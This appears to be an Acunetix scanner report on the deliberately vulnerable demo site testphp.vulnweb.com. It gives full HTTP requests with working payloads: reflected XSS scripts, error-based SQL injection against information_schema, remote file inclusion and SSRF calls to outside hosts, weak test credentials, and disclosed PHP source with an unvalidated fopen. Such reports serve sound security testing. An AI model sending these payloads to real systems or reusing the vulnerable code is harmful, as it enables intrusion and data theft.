User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

goButton=go&searchFor=1'%22()%26%25<ScRiPt%20>prompt(970931)</ScRiPt>

/secured/newuser.php
Details: URL encoded POST input uaddress was set to 3137%20Laguna%20Street'"()&%<ScRiPt >prompt(999592)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%2520Laguna%2520Street'%22()%26%25<ScRiPt%20>prompt(999592)</ScRiPt>&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=npkmulkd&uuname=npkmulkd

/secured/newuser.php
Details: URL encoded POST input ucc was set to 4111111111111111'"()&%<ScRiPt >prompt(959127)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111'%22()%26%25<ScRiPt%20>prompt(959127)</ScRiPt>&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=pcwfxsrj&uuname=pcwfxsrj

/secured/newuser.php
Details: URL encoded POST input uemail was set to sample%40email.tst'"()&%<ScRiPt >prompt(915355)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 239
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%2540email.tst'%22()%26%25<ScRiPt%20>prompt(915355)</ScRiPt>&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=tgvffjmw&uuname=tgvffjmw

/secured/newuser.php
Details: URL encoded POST input uphone was set to 555-666-0606'"()&%<ScRiPt >prompt(989159)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606'%22()%26%25<ScRiPt%20>prompt(989159)</ScRiPt>&urname=ixjtwixr&uuname=ixjtwixr

/secured/newuser.php
Details: URL encoded POST input urname was set to ixjtwixr'"()&%<ScRiPt >prompt(993411)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=ixjtwixr'%22()%26%25<ScRiPt%20>prompt(993411)</ScRiPt>&uuname=jnprxole

/secured/newuser.php
Details: URL encoded POST input uuname was set to jnprxole'"()&%<ScRiPt >prompt(911833)</ScRiPt>
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=himfkqej&uuname=jnprxole'%22()%26%25<ScRiPt%20>prompt(911833)</ScRiPt>


File inclusion
Severity: High
Type: Validation
Reported by module: Scripting (File_Inclusion.script)

Description
This script is possibly vulnerable to file inclusion attacks. It seems that this script includes a file whose name is determined using user-supplied data. This data is not properly validated before being passed to the include function.

Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the web server.

Recommendation
Edit the source code to ensure that input is properly validated. Where possible, it is recommended to make a list of accepted filenames and restrict the input to that list. For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option in php.ini.

References
PHP - Using remote files
OWASP PHP Top 5
Remote file inclusion

Affected items

/showimage.php
Details
URL encoded GET input file was set to http://testasp.vulnweb.com/t/fit.txt?%00.jpg
Error message found: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
GET /showimage.php?file=http://testasp.vulnweb.com/t/fit.txt%3f%2500.jpg HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/showimage.php
Details
URL encoded GET input file was set to http://testasp.vulnweb.com/t/fit.txt?%00.jpg
Error message found: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
GET /showimage.php?file=http://testasp.vulnweb.com/t/fit.txt%3f%2500.jpg&size=160 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


HTTP parameter pollution


Severity: High
Type: Configuration
Reported by module: Scripting (HTTP_Parameter_Pollution.script)

Description
This script is possibly vulnerable to HTTP Parameter Pollution attacks. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks.

Impact
The impact depends on the affected web application. An attacker could:
- Override existing hardcoded HTTP parameters
- Modify the application behaviour
- Access and potentially exploit uncontrollable variables
- Bypass input validation checkpoints and WAF rules

Recommendation
The application should properly sanitize user input (URL encode) to protect against this vulnerability.

References
HTTP Parameter Pollution

Affected items

/hpp/
Details
URL encoded GET input pp was set to 12&n926891=v988769
Parameter precedence: last occurrence
Affected link: params.php?p=valid&pp=12&n926891=v988769
Affected parameter: p=valid
Request headers
GET /hpp/?pp=12%26n926891%3dv988769 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


PHP allow_url_fopen enabled


Severity: High
Type: Configuration
Reported by module: Scripting (PHPInfo.script)

Description
The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default.

Impact
Application dependent - possible remote file inclusion.

Recommendation
You can disable allow_url_fopen from php.ini or .htaccess.

php.ini:
allow_url_fopen = 'off'

.htaccess:
php_flag allow_url_fopen off

Affected items

/secured/phpinfo.php
Details
This vulnerability was detected using the information from phpinfo() page /secured/phpinfo.php
allow_url_fopen: On
Request headers
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Script source code disclosure


Severity: High
Type: Validation
Reported by module: Scripting (Script_Source_Code_Disclosure.script)

Description
It is possible to read the source code of this script by using the script filename as a parameter. It seems that this script includes a file whose name is determined using user-supplied data. This data is not properly validated before being passed to the include function.

Impact
An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

Recommendation
Analyse the source code of this script and solve the problem.

References
Source Code Disclosure Can Be Exploited On Your Website

Affected items

/showimage.php
Details
URL encoded GET input file was set to showimage.php
Source disclosure pattern found:

<?php
// header("Content-Length: 1" /*. filesize($name)*/);
if( isset($_GET["file"]) && !isset($_GET["size"]) ){
    // open the file in a binary mode
    header("Content-Type: image/jpeg");
    $name = $_GET["file"];
    $fp = fopen($name, 'rb');
    // send the right headers
    header("Content-Type: image/jpeg");
    // dump the picture and stop the script
    fpassthru($fp);
    exit;
} elseif (isset($_GET["file"]) && isset($_GET["size"])){
    header("Content-Type: image/jpeg");
    $name = $_GET["file"];
    $fp = fopen($name.'.tn', 'rb');
    // send the right headers
    header("Content-Type: image/jpeg");
    // dump the picture and stop the script
    fpassthru($fp);
    exit;
}
?>

Request headers
GET /showimage.php?file=showimage.php HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

Server side request forgery


Severity: High
Type: Configuration
Reported by module: Scripting (Server_Side_Request_Forgery.script)

Description
SSRF (Server Side Request Forgery) is a vulnerability that allows an attacker to force server interfaces into sending packets, initiated by the victim server, to the local interface or to another server behind the firewall. Consult Web References for more information about this problem.

Impact
The impact varies according to the affected server interface.

Recommendation
Your script should properly sanitize user input.

References
SSRF VS. BUSINESS-CRITICAL APPLICATIONS

Affected items

/showimage.php
Details
URL encoded GET input file was set to http://hit88gOhDfx9x.bxss.me/
An HTTP request was initiated for the domain hit88gOhDfx9x.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery).
HTTP request details:
IP address: 176.28.50.165
User agent:
Request headers
GET /showimage.php?file=http://hit88gOhDfx9x.bxss.me/&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/showimage.php
Details
URL encoded GET input file was set to http://hittpCy6EuxV7.bxss.me/
An HTTP request was initiated for the domain hittpCy6EuxV7.bxss.me which indicates that this script is vulnerable to SSRF (Server Side Request Forgery).
HTTP request details:
IP address: 176.28.50.165
User agent:
Request headers
GET /showimage.php?file=http://hittpCy6EuxV7.bxss.me/ HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


SQL injection
Severity: High
Type: Validation
Reported by module: Scripting (Sql_Injection.script)

Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and do not properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there are a large number of vulnerable web applications.

Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub-selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Recommendation
Your script should filter metacharacters from user input. Check the detailed information for more information about fixing this vulnerability.

References
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
Acunetix SQL Injection Attack

Affected items

/AJAX/infoartist.php
Details
URL encoded GET input id was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infoartist.php on line 7
Request headers
GET /AJAX/infoartist.php?id=1'%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/AJAX/infocateg.php
Details
URL encoded GET input id was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infocateg.php on line 7
Request headers
GET /AJAX/infocateg.php?id=1'%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/AJAX/infotitle.php
Details
URL encoded POST input id was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/AJAX/infotitle.php on line 7
Request headers
POST /AJAX/infotitle.php HTTP/1.1
Content-Length: 8
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

id=1'%22

/artists.php
Details
URL encoded GET input artist was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
Request headers
GET /artists.php?artist=1'%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/product.php
Details
URL encoded GET input pic was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/product.php on line 70
Request headers
GET /product.php?pic=1'%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/search.php
Details
URL encoded GET input test was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61
Request headers
POST /search.php?test=1'%22 HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

goButton=go&searchFor=

/userinfo.php
Details
URL encoded POST input pass was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10
Request headers
POST /userinfo.php HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=1'%22&uname=elvkswdd

/userinfo.php
Details
URL encoded POST input uname was set to 1'"
Error message found: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10
Request headers
POST /userinfo.php HTTP/1.1
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=g00dPa%24%24w0rD&uname=1'%22


SQL injection (verified)


Severity: High
Type: Validation
Reported by module: Scripting (Sql_Injection.script)

Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and do not properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there are a large number of vulnerable web applications.

Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub-selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Recommendation
Your script should filter metacharacters from user input. Check the detailed information for more information about fixing this vulnerability.

References
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5

Affected items

/listproducts.php
Details
URL encoded GET input artist was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(66),CHAR(87),CHAR(102),CHAR(115),CHAR(68),CHAR(117),CHAR(116)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuKBWfsDut
Request headers
GET /listproducts.php?artist=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(75)%2cCHAR(66)%2cCHAR(87)%2cCHAR(102)%2cCHAR(115)%2cCHAR(68)%2cCHAR(117)%2cCHAR(116))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details
URL encoded GET input cat was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(90),CHAR(69),CHAR(108),CHAR(50),CHAR(101),CHAR(50),CHAR(57),CHAR(78)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuZEl2e29N
Request headers
GET /listproducts.php?cat=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(90)%2cCHAR(69)%2cCHAR(108)%2cCHAR(50)%2cCHAR(101)%2cCHAR(50)%2cCHAR(57)%2cCHAR(78))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/secured/newuser.php
Details
URL encoded POST input uuname was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(74),CHAR(76),CHAR(53),CHAR(48),CHAR(111),CHAR(66),CHAR(69),CHAR(102)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
Injected pattern found: 4CuJL50oBEf
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Length: 504
Content-Type: application/x-www-form-urlencoded
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

(line truncated)
...up=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=jojvplej&uuname='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(74)%2cCHAR(76)%2cCHAR(53)%2cCHAR(48)%2cCHAR(111)%2cCHAR(66)%2cCHAR(69)%2cCHAR(102))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'


Weak password
Severity: High
Type: Informational
Reported by module: Scripting (Html_Authentication_Audit.script)

Description
Manual confirmation is required for this alert. This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes.

Impact
An attacker may access the contents of the password-protected page.

Recommendation
Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words.

References
Authentication Hacking Attacks
Wikipedia - Password strength

Affected items

/userinfo.php
Details
Username: test, Password: test
Request headers
POST /userinfo.php HTTP/1.1
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=test&uname=test


.htaccess file readable


Severity: Medium
Type: Validation
Reported by module: Scripting (htaccess_File_Readable.script)

Description
This directory contains an .htaccess file that is readable. This may indicate a server misconfiguration. .htaccess files are designed to be parsed by the web server and should not be directly accessible. These files could contain sensitive information that could help an attacker to conduct further attacks. It's recommended to restrict access to this file.

Impact
Possible sensitive information disclosure.

Recommendation
Restrict access to the .htaccess file by adjusting the web server configuration.

Affected items

/Mod_Rewrite_Shop
Details
No details are available.
Request headers
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Application error message


Severity: Medium
Type: Validation
Reported by module: Scripting (Error_Message.script)

Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.

Recommendation
Review the source code for this script.

References
PHP Runtime Configuration

Affected items

/listproducts.php
Details
URL encoded GET input artist was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /listproducts.php?artist= HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details
URL encoded GET input artist was set to 1
Error message found: Unknown column 'Array' in 'where clause'
Request headers
GET /listproducts.php?artist[$acunetix]=1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details
URL encoded GET input cat was set to 1
Error message found: Unknown column 'Array' in 'where clause'
Request headers
GET /listproducts.php?cat[$acunetix]=1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details
URL encoded GET input cat was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /listproducts.php?cat= HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/secured/newuser.php
Details
URL encoded POST input uuname was set to '"\'\");|]*{%0d%0a<%00>%bf%27'
Error message found: You have an error in your SQL syntax
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Length: 213
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=moqpcgrb&uuname='"\'\");|]*{%0d%0a<%00>%bf%27'

/secured/newuser.php
Details
URL encoded POST input uuname was set to '"()
Error message found: You have an error in your SQL syntax
Request headers
POST /secured/newuser.php HTTP/1.1
Content-Length: 189
Content-Type: application/x-www-form-urlencoded
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=jvyykngv&uuname='%22()

/showimage.php
Details
URL encoded GET input file was set to 1
Error message found: Warning: fopen(): Unable to access Array.tn in /hj/var/www/showimage.php on line 19 Warning: fopen(Array.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19
Request headers
GET /showimage.php?file[$acunetix]=1&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/showimage.php
Details
URL encoded GET input file was set to
Error message found: Warning: fopen(): Unable to access .tn in /hj/var/www/showimage.php on line 19 Warning: fopen(.tn): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19
Request headers
GET /showimage.php?file=&size=160 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/showimage.php
Details
URL encoded GET input file was set to
Error message found: Warning: fopen(): Filename cannot be empty in /hj/var/www/showimage.php on line 7
Request headers
GET /showimage.php?file= HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Backup files
Severity: Medium
Type: Validation
Reported by module: Scripting (Backup_File.script)

Description
A possible backup file was found on your web server. These files are usually created by developers to back up their work.

Impact
Backup files can contain script sources, configuration files or other sensitive information that may help a malicious user to prepare more advanced attacks.

Recommendation
Remove the file(s) if they are not required on your website. As an additional step, it is recommended to implement a security policy within your organization to disallow creation of backup files in directories accessible from the web.

References
Protecting Confidential Documents at Your Site
Testing for Old, Backup and Unreferenced Files (OWASP-CM-006)
Security Tips for Server Configuration

Affected items


/index.bak
Details
This file was found using the pattern ${fileName}.bak. Original filename: index.php
Source code pattern found:

<?PHP
require_once("database_connect.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>Home of WASP Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a>
</div>
</div>
<!-- end masthead -->
<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id="pageName">welcome to our page</h2>
<div class="story">
<h3>Test site for WASP.</h3>
</div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->
<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
